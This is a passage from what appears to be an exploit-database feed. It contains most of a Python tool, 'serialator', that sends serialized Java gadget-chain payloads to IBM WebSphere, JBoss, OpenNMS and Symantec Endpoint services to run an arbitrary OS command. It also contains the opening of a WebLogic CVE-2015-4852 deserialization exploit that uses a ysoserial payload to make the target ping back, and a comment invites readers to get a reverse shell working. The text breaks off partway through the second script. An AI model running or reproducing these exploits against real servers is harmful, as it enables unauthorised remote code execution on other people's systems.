001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\")\r\n \r\n cleng = len(_cmd)\r\n body_serObj += chr(cleng) + _cmd\r\n body_serObj += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\")\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n headers = {\"User-Agent\":\"JBoss_RCE_POC\",\r\n \"Content-type\":\"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue\",\r\n \"Content-length\":\"%d\" % len(body_serObj)\r\n }\r\n resp, content = webservice.request(URL_ADDR+\"/invoker/JMXInvokerServlet\", \"POST\", body=body_serObj, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\ndef websphere_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the websphere_java_serialize.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for IBM WebSphere\r\n \"\"\"\r\n serObj3 = hex2raw3(\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\") # Setup initial parts of the payload packet\r\n cleng = len(_cmd) # Get the length of the payload\r\n serObj3 += chr(cleng) + _cmd # Convert the length to byte string, prepend to the payload and concatenate with the serialised payload.\r\n serObj3 += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\") # Complete the payload packet\r\n serObjB64_3 = base64.b64encode(serObj3.encode('ascii', errors='ignore')) # Base64 encode the whole payload\r\n \r\n body = \"\"\"<?xml version='1.0' encoding='UTF-8'?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n <SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\r\n </SOAP-ENV:Header>\r\n <SOAP-ENV:Body>\r\n <ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\r\n <operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\r\n <params xsi:type=\"ns1:[Ljava.lang.Object;\">%s</params>\r\n <signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\r\n </ns1:invoke>\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\"\"\" % serObjB64_3 # Append the payload to the request body.\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n headers = {\"User-Agent\":\"WebSphere_RCE_POC\",\r\n \"Content-type\":\"text/xml; charset=\\\"UTF-8\\\"\",\r\n \"SOAPAction\":\"\\\"urn:AdminService\\\"\",\r\n \"Content-length\":\"%d\" % len(body)\r\n }\r\n print(\"[i] Sending attack payload to %s\" % URL_ADDR)\r\n resp, content = webservice.request(URL_ADDR+\"/\", \"POST\", body=body, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\nif __name__ == \"__main__\":\r\n \r\n #\r\n # Main function\r\n #\r\n if not sys.version_info >= (3, 0):\r\n sys,exit(\"[x] WARNING - this script requires Python 3.x. Exiting\")\r\n \r\n # Setup command line arguments\r\n cmdparser = argparse.ArgumentParser(prog=\"serialator\", usage=\"\"\"\r\n ____ _ _ _ \r\n / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n ___) | __/ | | | (_| | | (_| | || (_) | | \r\n |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n by Nikhil Sreekumar (@roo7break) v {version}\r\n \r\n Usage: python3 %(prog)s [options]\r\n \r\n Options:\r\n -t Target (required)\r\n -p Port (required)\r\n -c CMD (required)\r\n --serv Target Service (default: websphere)\r\n --ssl Use SSL (default: OFF)\r\n --test Test if target is vulnerable (default: OFF)\r\n \"\"\".format(version=version), formatter_class=argparse.RawTextHelpFormatter)\r\n cmdparser.add_argument(\"-t\", \"--target\", default=\"127.0.0.1\", help=\"Target host\", required=True)\r\n cmdparser.add_argument(\"-p\", \"--port\", default=\"\", type=int, help=\"Target port\", required=True)\r\n cmdparser.add_argument(\"-c\", \"--cmd\", default=\"\", help=\"OS command to execute\")\r\n cmdparser.add_argument(\"--serv\", default=\"websphere\", choices=[\"websphere\", \"opennms\", \"jboss\",\"symantec\"])\r\n cmdparser.add_argument(\"--ssl\", action=\"store_true\", help=\"Use SSL for target service\")\r\n cmdparser.add_argument(\"--test\", action=\"store_true\", help=\"Use to test for vulnerability\")\r\n \r\n cmdargs = cmdparser.parse_args()\r\n \r\n if cmdargs.test:\r\n answ = input(\"[i] Before we start, I highly recommend you start Wireshark (filter: icmp.type == 8) or ICMPListener, now. Ready? (y/yes) \")\r\n if answ.lower() == 'y' or answ.lower() == 'yes':\r\n print(\"[i] Awesome. Lets ask the target server to ping our system\")\r\n tgtos = input(\"[?] What do you think the target OS is (win/unix): \")\r\n if tgtos.lower == \"win\":\r\n host_ip = input(\"[?] Provide LHOST: \")\r\n print(\"[i] Windows target selected. Sending \\'ping -n 5 <attack_ip>'\\ to target.\")\r\n cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r\n else:\r\n host_ip = input(\"[?] Provide LHOST: \")\r\n print(\"[i] Unix target selected. Sending \\'ping -c 5 <attack_ip>'\\ to target.\")\r\n cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r\n else:\r\n print(\"[i] Lazy bugger.. right, I am gonna continue anyway.\")\r\n \r\n if cmdargs.serv == \"websphere\":\r\n print(\"[i] WebSphere selected as target app.\")\r\n if cmdargs.test:\r\n websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n elif cmdargs.serv == \"opennms\":\r\n print(\"[i] OpenNMS selected as target app.\")\r\n if cmdargs.test:\r\n opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r\n elif cmdargs.serv == \"jboss\":\r\n print(\"[i] JBoss selected as target app.\")\r\n if cmdargs.test:\r\n jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n print(\"[i] Symantec Endpoint selected as target app.\")\r\n if cmdargs.test:\r\n symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n \r\n print(\"[i] Thank you for using this tool. Contact author for any comments.\")\n\n# 0day.today [2018-04-30] #", "sourceHref": "https://0day.today/exploit/30269", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T05:07:52", "description": "Exploit for java platform in category remote exploits", "cvss3": {}, "published": "2017-09-28T00:00:00", "type": "zdt", "title": "Oracle WebLogic Server 10.3.6.0 - Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2017-09-28T00:00:00", "id": "1337DAY-ID-28661", "href": "https://0day.today/exploit/description/28661", "sourceData": "# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution]\r\n# Date: [27/09/2017]\r\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\r\n# Vulnerability Author: FoxGloveSecurity\r\n# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html]\r\n# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0]\r\n# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr]\r\n# CVE : [CVE-2015-4852]\r\n \r\n'''\r\nThis exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send\r\nPing requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful.\r\nFeel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as \r\nthis script will do it for you on the fly.\r\n \r\nNote: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :)\r\n'''\r\n \r\n#!/usr/bin/env python\r\nimport socket\r\nimport sys\r\nimport struct\r\nfrom binascii import unhexlify\r\n \r\nprint \"\\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\"\r\nprint \"[+]Here is the command:\\n\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\\n\"\r\n \r\nif len(sys.argv) < 2:\r\n print \"\\n[+]Please provide target IP and Port...\"\r\n print \"[+]Usage:\\n\\t ./weblogic_linuxPing.py <target_ip> <target_port>\"\r\n sys.exit()\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_address = (sys.argv[1], int(sys.argv[2]))\r\nprint '[+]Connecting to %s port %s' % server_address\r\nsock.connect(server_address)\r\n \r\n#Send headers\r\nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\r\nprint '[+]Sending\\n\"%s\"' % headers\r\nsock.sendall(headers)\r\n \r\ndata = sock.recv(1024)\r\nprint >>sys.stderr, '\\n[+]Received \"%s\"' % data\r\n \r\n \r\n#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload.\r\n#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length\r\nchunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r\n \r\n \r\n#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out\r\n#len(payload) is xxxx bytes\r\n#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target.\r\n#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload.\r\n \r\n#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :)\r\nchunk2 = 